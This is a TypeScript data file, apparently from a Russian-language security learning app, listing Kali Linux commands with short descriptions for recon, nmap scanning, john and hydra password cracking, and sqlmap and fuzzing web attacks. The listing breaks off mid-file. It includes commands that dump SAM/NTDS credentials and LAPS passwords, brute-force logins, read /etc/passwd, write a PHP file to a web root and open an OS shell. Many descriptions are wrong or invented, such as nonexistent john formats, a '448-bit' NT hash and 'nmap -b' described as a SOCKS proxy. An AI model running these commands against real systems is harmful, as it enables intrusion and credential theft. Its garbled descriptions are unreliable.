// Код-библиотека CyberAlem: 2000 реальных команд, 3 части (Kali/Parrot/Ubuntu).
export interface CodeEntry { cmd: string; desc: string; }
export interface CodeCategory { name: string; entries: CodeEntry[]; }
export interface CodePart { id: string; os: string; subtitle: string; categories: CodeCategory[]; }
export const CODE_LIBRARY: CodePart[] = [
  { id: "kali", os: "Kali Linux", subtitle: "Оффензивная разработка: разведка, сканирование, web, эксплуатация, WiFi, форензика.", categories: [
    { name: "Reconnaissance", entries: [
      { cmd: "nmap -sn 192.168.1.0/24", desc: "Ping sweep: активные хосты без скана портов." },
      { cmd: "nmap -sP 10.0.0.0/24", desc: "Host discovery (устаревший флаг, то же что -sn)." },
      { cmd: "fping -a -g 192.168.1.0/24", desc: "Быстрый список живых хостов." },
      { cmd: "fping -s -g 10.10.0.0/24", desc: "Ping-статистика по сети (RTT, loss)." },
      { cmd: "arping -I eth0 192.168.1.10", desc: "ARP-проверка хоста в сегменте L2." },
      { cmd: "dig example.com A", desc: "A-запись (IPv4)." },
      { cmd: "dig example.com AAAA", desc: "AAAA-запись (IPv6)." },
      { cmd: "dig example.com MX", desc: "MX: почтовые серверы." },
      { cmd: "dig example.com TXT", desc: "TXT (SPF, DKIM, верификации)." },
      { cmd: "dig example.com NS", desc: "NS-серверы домена." },
      { cmd: "dig -t SOA example.com", desc: "SOA: primary, refresh, retry, expire." },
      { cmd: "dig +trace example.com", desc: "Полный путь: root → TLD → домен." },
      { cmd: "dig +short example.com", desc: "Только значения ответов." },
      { cmd: "dig @8.8.8.8 example.com", desc: "Запрос к конкретному резолверу." },
      { cmd: "host -t CNAME example.com", desc: "CNAME-алиасы." },
      { cmd: "host -t A -l example.com", desc: "AXFR зоны (если разрешён — утечка зоны)." },
      { cmd: "nslookup -type=MX example.com 1.1.1.1", desc: "MX через указанный DNS." },
      { cmd: "whois example.com", desc: "Регистратор, даты, abuse-контакты." },
      { cmd: "whois -h whois.ripe.net 192.168.1.1", desc: "IP-блок у конкретного RIR." },
      { cmd: "nbtstat -A 192.168.1.10", desc: "NetBIOS-имена Windows-хоста." },
      { cmd: "enum4linux -a 192.168.1.10", desc: "SMB/NBT: users, groups, shares, policy." },
      { cmd: "enum4linux -u admin -p pass 192.168.1.10", desc: "Авторизованная enum4linux." },
      { cmd: "smbclient -L //192.168.1.10 -N", desc: "Список SMB-шар (анонимно)." },
      { cmd: "smbclient -L //192.168.1.10 -U user%pass", desc: "Список SMB-шар (авторизованно)." },
      { cmd: "smbclient //192.168.1.10/share -U user%pass", desc: "Вход в шар: ls, get, put." },
      { cmd: "smbmap -u user -p pass 192.168.1.10", desc: "smbmap: шары и права доступа." },
      { cmd: "smbmap -u user -p pass --shares 192.168.1.10", desc: "smbmap: детали шар." },
      { cmd: "rpcclient -U user%pass 192.168.1.10", desc: "RPC: enumdomusers, lsa, srvinfo." },
      { cmd: "crackmapexec smb 192.168.1.0/24 -u admin -p pass --shares", desc: "CME: SMB-шары по подсети." },
      { cmd: "crackmapexec smb 192.168.1.0/24 -u admin -p pass --pass-pol", desc: "CME: политика паролей." },
      { cmd: "crackmapexec ldap dc01 -u admin -p pass --users", desc: "CME: LDAP-пользователи." },
      { cmd: "nxc smb 192.168.1.10 -u admin -p pass --sam", desc: "NXC: дамп SAM (NTLM)." },
      { cmd: "nxc smb 192.168.1.10 -u admin -p pass --secrets", desc: "NXC: secrets.dsr (NTDS)." },
      { cmd: "nxc smb 192.168.1.10 -u admin -p pass --local-groups", desc: "NXC: локальные группы." },
      { cmd: "nxc ldap dc01 -u admin -p pass --users", desc: "NXC: LDAP users." },
      { cmd: "ldapsearch -x -H ldap://dc01 -D 'CN=probe,DC=x' -W", desc: "LDAP simple bind." },
      { cmd: "ldapsearch -x -H ldap://dc01 -b 'DC=x' '(objectClass=user)' sAMAccountName mail", desc: "Все AD-пользователи с почтой." },
      { cmd: "ldapsearch -x -H ldap://dc01 -b 'DC=x' '(objectClass=group)' cn", desc: "LDAP-группы." },
      { cmd: "ldapsearch -x -H ldap://dc01 -b 'DC=x' '(objectClass=computer)' dNSHostName", desc: "Компьютеры домена." },
      { cmd: "ldapdomaindump -u user -p pass -o out.json dc01", desc: "LDAP-дамп домена в JSON." },
      { cmd: "impacket-secretsdump dc01 user%pass", desc: "Impacket: NTDS.dit remote (DS-Replication)." },
      { cmd: "impacket-secretsdump dc01 user%pass -just-dc", desc: "Только DC (NTDS)." },
      { cmd: "impacket-getTGT dc01/user@DOMAIN -dc-ip 10.0.0.1", desc: "TGT по логину/паролю." },
      { cmd: "impacket-psexec dc01 user%pass cmd.exe", desc: "PsExec удалённый процесс." },
      { cmd: "impacket-wmiexec dc01 user%pass whoami", desc: "WMI-исполнение (без бинарника)." },
      { cmd: "impacket-smbexec dc01 user%pass whoami", desc: "SMB-исполнение (интерактив)." },
      { cmd: "impacket-at dc01 user%pass whoami", desc: "Исполнение через task scheduler." },
      { cmd: "impacket-ldapsearch dc01 user%pass -F", desc: "Impacket: LDAP-энаумерация." },
      { cmd: "impacket-rpcdump dc01 user%pass", desc: "Impacket: RPC-дамп пользователей." },
      { cmd: "impacket-smbclient //192.168.1.10/share -U user%pass", desc: "Impacket: SMB-клиент (get/put)." },
      { cmd: "impacket-laps dc01 user%pass", desc: "Impacket: чтение LAPS-паролей." },
      { cmd: "adfind -f '(serviceprincipalname=*)' -all", desc: "adfind: все SPN (Kerberoasting)." },
      { cmd: "adfind -f '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)'", desc: "Объекты с уязвимостью RBCD." },
      { cmd: "whatweb example.com", desc: "Веб-стек: server, CMS, framework." },
      { cmd: "whatweb -a 3 example.com", desc: "Глубина 3 (более агрессивный анализ)." },
      { cmd: "wpscan --url http://target --enumerate ap,u,m", desc: "WordPress: плагины, пользователи, посты." },
      { cmd: "joomscan -u http://target", desc: "Joomla: версия, компоненты." },
      { cmd: "nikto -h http://target", desc: "Веб-сканер: уязвимости, устаревшее ПО." },
      { cmd: "dnsrecon -d example.com", desc: "DNS: субдомены, NS, MX, SOA." },
      { cmd: "dnsrecon -d example.com -t brt", desc: "DNS brute (wordlist)." },
      { cmd: "dnsmap example.com", desc: "DNS-маппинг + whois-контекст." },
      { cmd: "dnstracer example.com", desc: "Трейс DNS-цепочки до делегирования." },
      { cmd: "theHarvester example.com", desc: "Email/субдомены/хосты из публичных источников." },
      { cmd: "metagoofil -d example.com", desc: "Документы (PDF/DOC/XLS) по домену + метаданные." },
      { cmd: "subfinder -d example.com", desc: "Пассивная/активная субдомен-энаумерация." },
      { cmd: "amass enum -d example.com", desc: "Комбинированная DNS-разведка." },
      { cmd: "amass passive -d example.com", desc: "Только пассивные источники." },
      { cmd: "recon-ng", desc: "Интерактивный recon-фреймворк." },
      { cmd: "social-analyzer example.com", desc: "OSINT по соцсетям." },
      { cmd: "sn0int example.com", desc: "Мультиисточниковый OSINT." },
    ] },
    { name: "Scanning (nmap)", entries: [
      { cmd: "nmap -sS", desc: "SYN scan (half-open) — быстрый, не полный handshake." },
      { cmd: "nmap -sT", desc: "TCP connect scan — когда SYN недоступен (не root)." },
      { cmd: "nmap -sW", desc: "Window scan (без root)." },
      { cmd: "nmap -sA", desc: "ACK scan: контуры firewall/IPS." },
      { cmd: "nmap -sU", desc: "UDP-скан (медленный, но нужен для DNS/SNMP/TFTP)." },
      { cmd: "nmap -sV", desc: "Версии сервисов (banner, пробы)." },
      { cmd: "nmap -sC", desc: "Запуск стандартных NSE-скриптов." },
      { cmd: "nmap -O", desc: "Определение ОС по TCP/IP fingerprint." },
      { cmd: "nmap -A", desc: "Aggressive: -sV -O --script --traceroute." },
      { cmd: "nmap -Pn", desc: "Не слать ping: сканировать даже «мёртвые» хосты." },
      { cmd: "nmap -T0", desc: "Паранойя: минимальная скорость ( IDS)." },
      { cmd: "nmap -T1", desc: "Заговорщический: очень медленно." },
      { cmd: "nmap -T2", desc: "Тихий: задержка 100 мс." },
      { cmd: "nmap -T3", desc: "Нормальный (по умолчанию)." },
      { cmd: "nmap -T4", desc: "Быстрый: задержка 50 мс — оптимум для локалки." },
      { cmd: "nmap -T5", desc: "Бешеный: задержка 10 мс — высокий риск потерь." },
      { cmd: "nmap --min-rate 1000", desc: "Минимум 1000 пакетов/сек." },
      { cmd: "nmap --max-retries 2", desc: "Лимит повторов на пакет." },
      { cmd: "nmap --source-port 53", desc: "Шлём с порта 53 (обход простых FW)." },
      { cmd: "nmap --reason", desc: "Показывать причину каждого вывода." },
      { cmd: "nmap -f", desc: "Фрагментация пакетов (обход простых IDS)." },
      { cmd: "nmap --mtu 8", desc: "Свой MTU для фрагментации." },
      { cmd: "nmap -e eth0", desc: "Выбор интерфейса." },
      { cmd: "nmap -iL hosts.txt", desc: "Список целей из файла." },
      { cmd: "nmap -oA fullscan", desc: "Результат в .nmap + .xml + .gnmap." },
      { cmd: "nmap -oN scan.txt", desc: "Обычный текстовый отчёт." },
      { cmd: "nmap -oX scan.xml", desc: "XML (для XSLT/парсинга)." },
      { cmd: "nmap --script vuln", desc: "NSE: категория vuln." },
      { cmd: "nmap --script safe", desc: "NSE: безопасные скрипты." },
      { cmd: "nmap --script default", desc: "Категория default (как -sC)." },
      { cmd: "nmap --script intrusive", desc: "Глубокие скрипты (может ронать сервисы)." },
      { cmd: "nmap --script-args vuln=...", desc: "Аргументы для NSE." },
      { cmd: "nmap --version-intensity 5", desc: "Глубина определения версий (0–9)." },
      { cmd: "nmap --version-light", desc: "Лёгкое определение версий." },
      { cmd: "nmap --version-all", desc: "Максимальное определение версий." },
      { cmd: "nmap --osscan-guess", desc: "Угадывать ОС при неполном фангпринте." },
      { cmd: "nmap --dns-all", desc: "Все DNS-записи (A, AAAA, CNAME, PTR, TXT)." },
      { cmd: "nmap --dns-servers 8.8.8.8", desc: "Свой DNS для PTR/имён." },
      { cmd: "nmap --data-length 16", desc: "Наполнить пакет 16 случайных байт (обход IDS)." },
      { cmd: "nmap -n", desc: "Не делать обратного DNS." },
      { cmd: "nmap -6", desc: "IPv6-сканирование." },
      { cmd: "nmap --open", desc: "Показывать только открытые порты." },
      { cmd: "nmap --packet-trace", desc: "Показывать каждый отправленный/полученный пакет." },
      { cmd: "nmap --iflist", desc: "Список интерфейсов nmap." },
      { cmd: "nmap --exclude 192.168.1.1", desc: "Исключить хост из скана." },
      { cmd: "nmap --host-timeout 30m", desc: "Пропустить хост после 30 минут." },
      { cmd: "nmap --max-parallelism 100", desc: "Лимит параллельных пробок." },
      { cmd: "nmap --scan-delay 10s", desc: "Пауза между хостами." },
      { cmd: "nmap --append-output scan.txt", desc: "Дописать в существующий отчёт." },
      { cmd: "nmap -v", desc: "Подробный вывод." },
      { cmd: "nmap -vv", desc: "Очень подробный вывод." },
      { cmd: "nmap -d", desc: "Debug (уровень 1)." },
      { cmd: "nmap --stats-every 10m", desc: "Промежуточная статистика каждые 10 минут." },
      { cmd: "nmap -sI zombie", desc: "Zombie scan (NULL window) через хост-зомби." },
      { cmd: "nmap --ipprotosweep", desc: "Сканирование IP-протоколов." },
      { cmd: "nmap -b 192.168.1.2", desc: "Прокси через SOCKS4." },
      { cmd: "nmap -sS -sV -T4 192.168.1.10", desc: "Классический SYN + версии." },
      { cmd: "nmap -sU --top-ports 20 192.168.1.10", desc: "UDP top-20." },
      { cmd: "nmap -p- 192.168.1.10", desc: "Все 65535 TCP-портов." },
      { cmd: "nmap -p 1-1024 192.168.1.10", desc: "Системные порты." },
    ] },
    { name: "Password (john)", entries: [
      { cmd: "john --wordlist=rockyou.txt --format=NT hash.txt", desc: "John: Windows NT-хеш (448-бит)." },
      { cmd: "john --wordlist=rockyou.txt --format=LM hash.txt", desc: "John: Устаревший LAN Manager (16-бит по хвостам)." },
      { cmd: "john --wordlist=rockyou.txt --format=Raw-MD5 hash.txt", desc: "John: Сырой MD5." },
      { cmd: "john --wordlist=rockyou.txt --format=Raw-SHA1 hash.txt", desc: "John: Сырой SHA-1." },
      { cmd: "john --wordlist=rockyou.txt --format=Raw-SHA256 hash.txt", desc: "John: Сырой SHA-256." },
      { cmd: "john --wordlist=rockyou.txt --format=Raw-SHA512 hash.txt", desc: "John: Сырой SHA-512." },
      { cmd: "john --wordlist=rockyou.txt --format=bcrypt hash.txt", desc: "John: bcrypt ($2a/$2b/$2y)." },
      { cmd: "john --wordlist=rockyou.txt --format=phpass hash.txt", desc: "John: MD5-based phpass (Drupal, old WP)." },
      { cmd: "john --wordlist=rockyou.txt --format=WPA hash.txt", desc: "John: WPA/WPA2 PMKID-хеш." },
      { cmd: "john --wordlist=rockyou.txt --format=OpenSSH hash.txt", desc: "John: OpenSSH-хеш (authorized_keys)." },
      { cmd: "john --wordlist=rockyou.txt --format=Kerberos-4 hash.txt", desc: "John: Kerberos 4." },
      { cmd: "john --wordlist=rockyou.txt --format=Kerberos-5 hash.txt", desc: "John: Kerberos 5 (AS-REQ/TGS-REP)." },
      { cmd: "john --wordlist=rockyou.txt --format=DPAP hash.txt", desc: "John: Windows DPAP (master key)." },
      { cmd: "john --wordlist=rockyou.txt --format=NetNTLMv1 hash.txt", desc: "John: NTLMv1 challenge-response." },
      { cmd: "john --wordlist=rockyou.txt --format=NetNTLMv2 hash.txt", desc: "John: NTLMv2 challenge-response." },
      { cmd: "john --wordlist=rockyou.txt --format=Cisco-7 hash.txt", desc: "John: Cisco type-7 (обратимый XOR)." },
      { cmd: "john --wordlist=rockyou.txt --format=Cisco-ios hash.txt", desc: "John: Cisco IOS типа 0/4/5/8." },
      { cmd: "john --wordlist=rockyou.txt --format=zip hash.txt", desc: "John: ZIP (PKZIP) пароль." },
      { cmd: "john --wordlist=rockyou.txt --format=7z hash.txt", desc: "John: 7z-архив." },
      { cmd: "john --wordlist=rockyou.txt --format=RAR5 hash.txt", desc: "John: RAR5-архив." },
      { cmd: "john --wordlist=rockyou.txt --format=gpg-sym hash.txt", desc: "John: GPG симметричное шифрование." },
      { cmd: "john --wordlist=rockyou.txt --format=pdf hash.txt", desc: "John: Adobe PDF-пароль." },
      { cmd: "john --wordlist=rockyou.txt --format=office hash.txt", desc: "John: MS Office (docx/xlsx) пароль." },
      { cmd: "john --wordlist=rockyou.txt --format=LastPass1 hash.txt", desc: "John: LastPass v1." },
      { cmd: "john --wordlist=rockyou.txt --format=KeePassX hash.txt", desc: "John: KeePassX-бд." },
      { cmd: "john --wordlist=rockyou.txt --format=Android-FDE hash.txt", desc: "John: Android Full Disk Encryption." },
      { cmd: "john --wordlist=rockyou.txt --format=Bitcoin-Wallet hash.txt", desc: "John: Bitcoin-кошелёк (bitaddress)." },
      { cmd: "john --wordlist=rockyou.txt --format=Putty-Session hash.txt", desc: "John: PuTTY-сессия." },
      { cmd: "john --wordlist=rockyou.txt --format=SSH-SSHA hash.txt", desc: "John: SSHA из /etc/shadow (OpenSSH)." },
      { cmd: "john --wordlist=rockyou.txt --format=md5crypt$SHA512$ hash.txt", desc: "John: Linux /etc/shadow y$ (SHA-512 crypt)." },
      { cmd: "john --wordlist=rockyou.txt --format=LM-DES hash.txt", desc: "John: DES LM (по хвостам)." },
      { cmd: "john --wordlist=rockyou.txt --format=3DES-168 hash.txt", desc: "John: 3DES-168." },
      { cmd: "john --wordlist=rockyou.txt --format=DES-64 hash.txt", desc: "John: DES-64." },
      { cmd: "john --wordlist=rockyou.txt --format=Blowfish-96 hash.txt", desc: "John: Blowfish-96." },
      { cmd: "john --wordlist=rockyou.txt --format=Twofish-192 hash.txt", desc: "John: Twofish-192." },
      { cmd: "john --wordlist=rockyou.txt --format=GOST-28147-89 hash.txt", desc: "John: GOST 28147-89." },
      { cmd: "john --wordlist=rockyou.txt --format=Salsa20-256 hash.txt", desc: "John: Salsa20-256." },
      { cmd: "john --wordlist=rockyou.txt --format=ChaCha20-256 hash.txt", desc: "John: ChaCha20-256." },
      { cmd: "john --wordlist=rockyou.txt --format=Whirlpool hash.txt", desc: "John: Whirlpool." },
      { cmd: "john --wordlist=rockyou.txt --format=GOST-R-34.11-94 hash.txt", desc: "John: GOST R 34.11-94." },
      { cmd: "john --wordlist=rockyou.txt --format=SHA3-256 hash.txt", desc: "John: SHA3-256." },
      { cmd: "john --wordlist=rockyou.txt --format=Keccak-256 hash.txt", desc: "John: Keccak-256." },
      { cmd: "john --wordlist=rockyou.txt --format=BLAKE2b-512 hash.txt", desc: "John: BLAKE2b-512." },
      { cmd: "john --wordlist=rockyou.txt --format=HMAC-SHA256 hash.txt", desc: "John: HMAC-SHA256." },
      { cmd: "john --wordlist=rockyou.txt --format=PBKDF2-HMAC-SHA256 hash.txt", desc: "John: PBKDF2-HMAC-SHA256." },
      { cmd: "john --wordlist=rockyou.txt --format=Scrypt hash.txt", desc: "John: Scrypt." },
      { cmd: "john --wordlist=rockyou.txt --format=Argon2id hash.txt", desc: "John: Argon2id." },
      { cmd: "john --show hash.txt", desc: "Показать найденные пароли." },
      { cmd: "john --list=formats", desc: "Список всех форматов." },
      { cmd: "john --format=help", desc: "Справка по формату." },
      { cmd: "john --incremental hash.txt", desc: "Брутфорс (маски a[1..8])." },
      { cmd: "john --rules --wordlist=rockyou.txt hash.txt", desc: "Словарь + морфологические правила." },
      { cmd: "john --wordlist=rockyou.txt --max-length=8 hash.txt", desc: "Лимит длины." },
      { cmd: "john --min-length=4 --max-length=12 --wordlist=rockyou.txt hash.txt", desc: "Диапазон длин." },
      { cmd: "john --fork=4 hash.txt", desc: "4 процесса (по ядрам)." },
      { cmd: "john --session=work --fork=2 hash.txt", desc: "Именованная сессия." },
      { cmd: "john --restore", desc: "Восстановить прерванную сессию." },
      { cmd: "john --status", desc: "Статус текущей сессии." },
    ] },
    { name: "Password (hydra)", entries: [
      { cmd: "hydra -L users.txt -P rockyou.txt ssh://target", desc: "hydra: SSH" },
      { cmd: "hydra -L users.txt -P rockyou.txt ftp://target", desc: "hydra: FTP" },
      { cmd: "hydra -L users.txt -P rockyou.txt ftpes://target", desc: "hydra: FTPS" },
      { cmd: "hydra -L users.txt -P rockyou.txt sftp://target", desc: "hydra: SFTP" },
      { cmd: "hydra -L users.txt -P rockyou.txt telnet://target", desc: "hydra: Telnet" },
      { cmd: "hydra -L users.txt -P rockyou.txt telnet-ssl://target", desc: "hydra: Telnet over TLS" },
      { cmd: "hydra -L users.txt -P rockyou.txt rlogin://target", desc: "hydra: rlogin" },
      { cmd: "hydra -L users.txt -P rockyou.txt rsh://target", desc: "hydra: rsh" },
      { cmd: "hydra -L users.txt -P rockyou.txt smtp://target", desc: "hydra: SMTP" },
      { cmd: "hydra -L users.txt -P rockyou.txt smtps://target", desc: "hydra: SMTPS" },
      { cmd: "hydra -L users.txt -P rockyou.txt smtp-user://target", desc: "hydra: SMTP (логин в EHLO)" },
      { cmd: "hydra -L users.txt -P rockyou.txt pop3://target", desc: "hydra: POP3" },
      { cmd: "hydra -L users.txt -P rockyou.txt pop3s://target", desc: "hydra: POP3S" },
      { cmd: "hydra -L users.txt -P rockyou.txt imap://target", desc: "hydra: IMAP" },
      { cmd: "hydra -L users.txt -P rockyou.txt imaps://target", desc: "hydra: IMAPS" },
      { cmd: "hydra -L users.txt -P rockyou.txt nnntp://target", desc: "hydra: NNTP" },
      { cmd: "hydra -L users.txt -P rockyou.txt vnc://target", desc: "hydra: VNC" },
      { cmd: "hydra -L users.txt -P rockyou.txt pcanywhere://target", desc: "hydra: PC-Anywhere" },
      { cmd: "hydra -L users.txt -P rockyou.txt smb://target", desc: "hydra: SMB (NetBIOS)" },
      { cmd: "hydra -L users.txt -P rockyou.txt smbnt://target", desc: "hydra: SMB (NT)" },
      { cmd: "hydra -L users.txt -P rockyou.txt cisco://target", desc: "hydra: Cisco (enable)" },
      { cmd: "hydra -L users.txt -P rockyou.txt cisco-enable://target", desc: "hydra: Cisco enable" },
      { cmd: "hydra -L users.txt -P rockyou.txt h323://target", desc: "hydra: H.323" },
      { cmd: "hydra -L users.txt -P rockyou.txt sip://target", desc: "hydra: SIP" },
      { cmd: "hydra -L users.txt -P rockyou.txt socks5://target", desc: "hydra: SOCKS5" },
      { cmd: "hydra -L users.txt -P rockyou.txt http-get://target", desc: "hydra: HTTP GET-форма" },
      { cmd: "hydra -L users.txt -P rockyou.txt http-post://target", desc: "hydra: HTTP POST" },
      { cmd: "hydra -L users.txt -P rockyou.txt http-proxy://target", desc: "hydra: HTTP-прокси" },
      { cmd: "hydra -L users.txt -P rockyou.txt http-head://target", desc: "hydra: HTTP HEAD" },
      { cmd: "hydra -L users.txt -P rockyou.txt http-form://target", desc: "hydra: HTTP form (user=FUZZ&pass=FUZZ)" },
      { cmd: "hydra -L users.txt -P rockyou.txt https-get://target", desc: "hydra: HTTPS GET" },
      { cmd: "hydra -L users.txt -P rockyou.txt https-post://target", desc: "hydra: HTTPS POST" },
      { cmd: "hydra -L users.txt -P rockyou.txt https-head://target", desc: "hydra: HTTPS HEAD" },
      { cmd: "hydra -L users.txt -P rockyou.txt ldap://target", desc: "hydra: LDAP" },
      { cmd: "hydra -L users.txt -P rockyou.txt ldaps://target", desc: "hydra: LDAPS" },
      { cmd: "hydra -L users.txt -P rockyou.txt ldap2://target", desc: "hydra: LDAPv2" },
      { cmd: "hydra -L users.txt -P rockyou.txt ldap3://target", desc: "hydra: LDAPv3" },
      { cmd: "hydra -L users.txt -P rockyou.txt svn://target", desc: "hydra: Subversion" },
      { cmd: "hydra -L users.txt -P rockyou.txt cvs://target", desc: "hydra: CVS" },
      { cmd: "hydra -L users.txt -P rockyou.txt mssql://target", desc: "hydra: MSSQL" },
      { cmd: "hydra -L users.txt -P rockyou.txt mysql://target", desc: "hydra: MySQL" },
      { cmd: "hydra -L users.txt -P rockyou.txt mysql5://target", desc: "hydra: MySQL 4.1+" },
      { cmd: "hydra -L users.txt -P rockyou.txt oracle-s://target", desc: "hydra: Oracle (SQL*Net)" },
      { cmd: "hydra -L users.txt -P rockyou.txt pgsql://target", desc: "hydra: PostgreSQL" },
      { cmd: "hydra -L users.txt -P rockyou.txt redis://target", desc: "hydra: Redis" },
      { cmd: "hydra -L users.txt -P rockyou.txt vmauthd://target", desc: "hydra: VMware vmauthd" },
      { cmd: "hydra -L users.txt -P rockyou.txt x11://target", desc: "hydra: X11" },
      { cmd: "hydra -L users.txt -P rockyou.txt irc://target", desc: "hydra: IRC" },
      { cmd: "hydra -L users.txt -P rockyou.txt jupyter://target", desc: "hydra: Jupyter Notebook" },
      { cmd: "hydra -L users.txt -P rockyou.txt kerberos-4://target", desc: "hydra: Kerberos 4" },
      { cmd: "hydra -L users.txt -P rockyou.txt lotus-notes://target", desc: "hydra: Lotus Notes" },
      { cmd: "hydra -L users.txt -P rockyou.txt pcnns://target", desc: "hydra: PC-NN Server" },
      { cmd: "hydra -L users.txt -P rockyou.txt pcserver://target", desc: "hydra: PC-Server" },
      { cmd: "hydra -L users.txt -P rockyou.txt snmp://target", desc: "hydra: SNMP (community)" },
      { cmd: "hydra -L users.txt -P rockyou.txt rdp://target", desc: "hydra: RDP" },
      { cmd: "hydra -L users.txt -P rockyou.txt afp://target", desc: "hydra: AFP (Apple)" },
      { cmd: "hydra -l admin -P rockyou.txt ssh://target", desc: "Один логин × словарь." },
      { cmd: "hydra -l admin -p 'pass' ssh://target", desc: "Одна пара (проверка)." },
      { cmd: "hydra -t 4 -w 15 ssh://target", desc: "4 параллельных потока, 15 попыток/сек." },
      { cmd: "hydra -o out.txt ssh://target", desc: "Вывод в файл." },
      { cmd: "hydra -f ssh://target", desc: "Стоп после первой пары." },
      { cmd: "hydra -V", desc: "Версия hydra." },
    ] },
    { name: "Web attacks", entries: [
      { cmd: "sqlmap -u 'http://t/p?id=1' --batch", desc: "Авто-режим (без вопросов)." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --dbs", desc: "Список баз данных." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --tables -D db", desc: "Таблицы базы db." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --columns -D db -t users", desc: "Колонки таблицы users." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --dump -D db -t users", desc: "Дамп таблицы users." },
      { cmd: "sqlmap -u 'http://t/' --cookie='PHPSESSID=abc'", desc: "SQLi через cookie." },
      { cmd: "sqlmap -u 'http://t/' --data='user=x&pass=y'", desc: "POST-данные." },
      { cmd: "sqlmap -u 'http://t/p' --headers='X-Forwarded-For: 1.2.3.4'", desc: "SQLi в HTTP-заголовке." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --tamper=between,space2comment", desc: "Обход WAF (tamper-скрипты)." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --level=5 --risk=3", desc: "Глубокий анализ (все параметры)." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --os-shell", desc: "Shell (если RCE)." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --os-cmd='whoami'", desc: "Одна команда на цели." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --os-pwn", desc: "Shell (авто-выбор метода)." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --file-read=/etc/passwd", desc: "Чтение файла с цели." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --file-write=x.php --file-dest=/var/www/x.php", desc: "Запись файла на цель." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --technique=BEUSTQ", desc: "Только конкретные техники." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --dbms=mysql", desc: "Указать СУБД вручную." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --current-user", desc: "Пользователь БД." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --current-db", desc: "Текущая база." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --is-dbn", desc: "Детект: да/нет." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --identify-waf", desc: "Определить WAF." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --time-sec=5", desc: "Слепой SQLi: тайминг 5 сек." },
      { cmd: "sqlmap -u 'http://t/' --forms", desc: "SQLi во всех формах." },
      { cmd: "sqlmap -u 'http://t/' --crawl=3", desc: "SQLi по всему сайту." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --random-agent", desc: "Случайный User-Agent." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --delay=2", desc: "Пауза 2 сек." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --threads=4", desc: "4 потока." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --proxy='http://127.0.0.1:8080'", desc: "Через прокси (Burp)." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --prefix='(' --suffix=')'", desc: "Обёртка для инъекта." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --union-cols=3", desc: "UNION: 3 колонки." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --dump-format=csv", desc: "Дамп в CSV." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --dump-id=5", desc: "Дамп записи id=5." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --purge-output", desc: "Удалить старые отчёты." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --output-dir=/tmp/sq", desc: "Каталог отчётов." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --retries=10", desc: "Повторы запроса." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --timeout=15", desc: "Таймаут 15 сек." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --flush-session", desc: "Сброс сессии." },
      { cmd: "gobuster dir -u http://t -w /usr/share/wordlists/dirb/common.txt", desc: "Поиск каталогов (GET)." },
      { cmd: "gobuster dir -u http://t -w /usr/share/wordlists/dirb/common.txt -x php,html,txt", desc: "С расширениями." },
      { cmd: "gobuster vhost -u http://t -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-10000.txt", desc: "VHost-энаумерация." },
      { cmd: "gobuster dns -d example.com -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-10000.txt", desc: "DNS-брут (gobuster)." },
      { cmd: "gobuster fuzz -u http://t/FUZZ -w rockyou.txt", desc: "Фаззинг произвольного URL." },
      { cmd: "gobuster fuzz -u http://t -X POST -d 'user=FUZZ' -w users.txt", desc: "Фаззинг POST-параметра." },
      { cmd: "dirb http://t /usr/share/wordlists/dirb/common.txt", desc: "Классический dirb." },
      { cmd: "dirb http://t /usr/share/wordlists/dirb/big.txt", desc: "Крупный wordlist." },
      { cmd: "dirb http://t /usr/share/wordlists/dirb/common.txt php", desc: "С расширением php." },
      { cmd: "dirsearch -u http://t", desc: "dirsearch: каталоги + файлы." },
      { cmd: "dirsearch -u http://t -e php,asp,jsp", desc: "С расширениями." },
      { cmd: "dirsearch -u http://t -e js,php --full-url", desc: "Полные URL в выводе." },
      { cmd: "ffuf -u http://t/FUZZ -w /usr/share/wordlists/rockyou.txt", desc: "ffuf: фаззер (быстрый)." },
      { cmd: "ffuf -u http://t/FUZZ -w rockyou.txt -e php,html", desc: "С расширениями." },
      { cmd: "ffuf -u http://t/FUZZ -w rockyou.txt -mc 200,301,403", desc: "Фильтр по кодам." },
      { cmd: "ffuf -u http://t/FUZZ -w rockyou.txt -fc 404", desc: "Скрыть 404." },
      { cmd: "ffuf -u http://t -X POST -d 'user=FUZZ&pass=x' -w rockyou.txt", desc: "POST-фаззинг." },
      { cmd: "ffuf -u http://t -H 'X-Api-Key: FUZZ' -w rockyou.txt", desc: "Фаззинг заголовка." },
      { cmd: "ffuf -u http://t/FUZZ -w rockyou.txt -ma 100", desc: "Лимит длины ответа." },
      { cmd: "ffuf -u http://t/FUZZ -w rockyou.txt -mc 200 -fw 1234", desc: "Фильтр по слову/длинне." },
      { cmd: "wfuzz -w /usr/share/wordlists/dirb/common.txt http://t/", desc: "wfuzz: каталоги." },
      { cmd: "wfuzz -w rockyou.txt http://t/p?user=word", desc: "wfuzz: параметр." },
